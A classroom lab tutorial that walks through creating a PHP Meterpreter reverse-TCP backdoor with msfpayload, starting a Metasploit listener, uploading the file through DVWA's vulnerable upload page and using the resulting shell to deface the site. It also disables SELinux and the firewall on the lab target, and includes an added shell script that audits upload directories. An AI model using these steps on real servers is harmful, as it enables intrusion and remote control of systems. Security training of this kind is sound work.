Monday, November 18, 2013

Hands-On Tutorial - Upload PHP Backdoor Payload (DVWA): Lesson 8



Section 0. Background Information
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers/students to teach/learn web application security in a classroom environment.
  • Pre-Requisite Labs
  • Lab Notes
    • In this lab we will do the following:
      1. We will create a php/meterpreter/reverse_tcp payload
      2. We will start the php/meterpreter/reverse_tcp listener
      3. We will upload the PHP payload to the DVWA Upload screen
      4. We will use the PHP payload to establish a connection to the DVWA (Fedora14) machine.
  • Legal Disclaimer
    • This tutorial is for classroom use.

Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit Fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • In this example, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
      3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Placing a "0" in the enforce file puts SELinux in permissive mode.
      2. sestatus
        • Notice that "Current mode:" changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
      2. service iptables stop
        • This command disables the firewall.

Section 5. Fix Upload Ownership and Permissions
  1. Fix Ownership and Permissions
    • Instructions:
      1. Bring up a Terminal Console on the DVWA (Fedora14) machine.
      2. chown root:apache /var/www/html/dvwa/hackable/uploads/
      3. chmod 775 /var/www/html/dvwa/hackable/uploads/
      4. ls -ld /var/www/html/dvwa/hackable/uploads/
    • Known Issue:
      1. By default, the /var/www/html/dvwa/hackable/uploads/ directory is user and group owned by root.
      2. In addition, the apache user does not have "write" permission, which is needed to allow a user to place a file in the hackable/uploads directory.

Section 6. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 7. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME desktop
    • Instructions:
      1. Type startx

Section 8. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • In this example, my IP address is 192.168.1.105.
      • Please record your IP address.


Section 9. Build PHP msfpayload
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Create msfpayload
    • Instructions:
      1. mkdir -p /root/backdoor
      2. cd /root/backdoor
      3. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > PHONE_HOME.php
        • Obtain the BackTrack IP Address from (Section 8, Step 2).
      4. ls -l PHONE_HOME.php
  3. Edit PHONE_HOME.php
    • Instructions:
      1. vi PHONE_HOME.php
  4. Remove the "#" character
    • Instructions:
      1. Press "x" to delete the "#" character on the first line.
      2. Press <Esc>
      3. Type ":wq!"

Section 10. Start PHP Payload Listener
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Start msfconsole
    • Instructions:
      1. msfconsole
  3. Start PHP Listener
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD php/meterpreter/reverse_tcp
      3. set LHOST 192.168.1.105
        • Obtain the BackTrack IP Address from (Section 8, Step 2).
      4. set LPORT 4444
      5. exploit
      6. Continue to Next Section

Section 11. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 12. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

Section 13. Upload PHP Payload
  1. Upload Menu
    • Instructions:
      1. Select "Upload" from the left navigation menu.
      2. Click Browse
  2. Navigate to PHONE_HOME.php
    • Instructions:
      1. Click on File System
      2. Click on root
      3. Click on backdoor
      4. Select Open
  3. Upload PHONE_HOME.php
    • Instructions:
      1. Click the Upload button
  4. Activate PHONE_HOME.php
    • Instructions:
      1. Place http://192.168.1.106/dvwa/hackable/uploads/ in the Firefox address bar.
        • This is the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
      2. Click on PHONE_HOME.php
      3. Continue to next step
  5. Connection Established
    • Notes:
      1. Notice the stage was sent to the DVWA machine (Fedora14) along with the handy dandy meterpreter.
      2. Continue to next step.
  6. Establishing a Shell
    • Instructions:
      1. shell
        • Establishes a "sh" shell.
      2. uptime
        • Shows how long the server has been up.
      3. pwd
        • Shows the current working directory.
      4. whoami
        • Shows which user you are logged in as.
      5. w
        • Notice there is no entry for the user apache
      6. echo "Hacked at 4-23-2012, by Your Name" > hacked.html
        • Create some simple web graffiti
        • Replace 4-23-2012 with the present date.
        • Replace the string "Your Name" with your actual name.
      7. ls -l
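
From the defender's side, the upload and activation steps above leave a server-executable file in a web-served, apache-writable directory. The following added example (not part of the original lab) is a shell function that audits an upload directory such as /var/www/html/dvwa/hackable/uploads/ for script extensions, handler overrides and embedded PHP open tags; the function name, extension list and content markers are assumptions.

```shell
#!/bin/sh
# Added example, not from the original lab. The extension list and the
# content markers are assumptions; match them to your server's handlers.

# audit_uploads DIR
# Prints "reason<TAB>path" for each file the web server might run as script.
# Returns 0 if nothing is flagged, 1 if anything is, 2 if DIR is missing.
audit_uploads() {
    dir=$1
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    findings=$(
        find "$dir" -type f | while IFS= read -r f; do
            # Compare on the lower-cased file name: PHONE_HOME.PHP counts too.
            name=$(basename "$f" | tr 'A-Z' 'a-z')
            case "$name" in
                *.php|*.php[0-9]|*.phtml|*.phar|*.php.*)
                    # Includes double extensions such as name.php.jpg.
                    printf 'script-extension\t%s\n' "$f" ;;
                .htaccess)
                    # A per-directory override can remap handlers.
                    printf 'handler-override\t%s\n' "$f" ;;
                *)
                    # Content check: PHP open tag behind a harmless name.
                    if grep -qaF -e '<?php' -e '<?=' "$f"; then
                        printf 'php-open-tag\t%s\n' "$f"
                    fi ;;
            esac
        done
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Stand-alone use: sh audit_uploads.sh /var/www/html/dvwa/hackable/uploads/
if [ "$#" -gt 0 ]; then
    audit_uploads "$1"
fi
```

The non-zero exit status on any finding lets the check run from cron or a monitoring agent and alert when a file like PHONE_HOME.php appears in the uploads directory.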

Section 14. Proof of Lab
  1. Proof of Lab
    • Proof of Lab Instructions:
      1. On BackTrack, place the below URI in Firefox
        • http://192.168.1.106/dvwa/hackable/uploads/hacked.html
          • Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Email to Csirt247@Gmail.Com
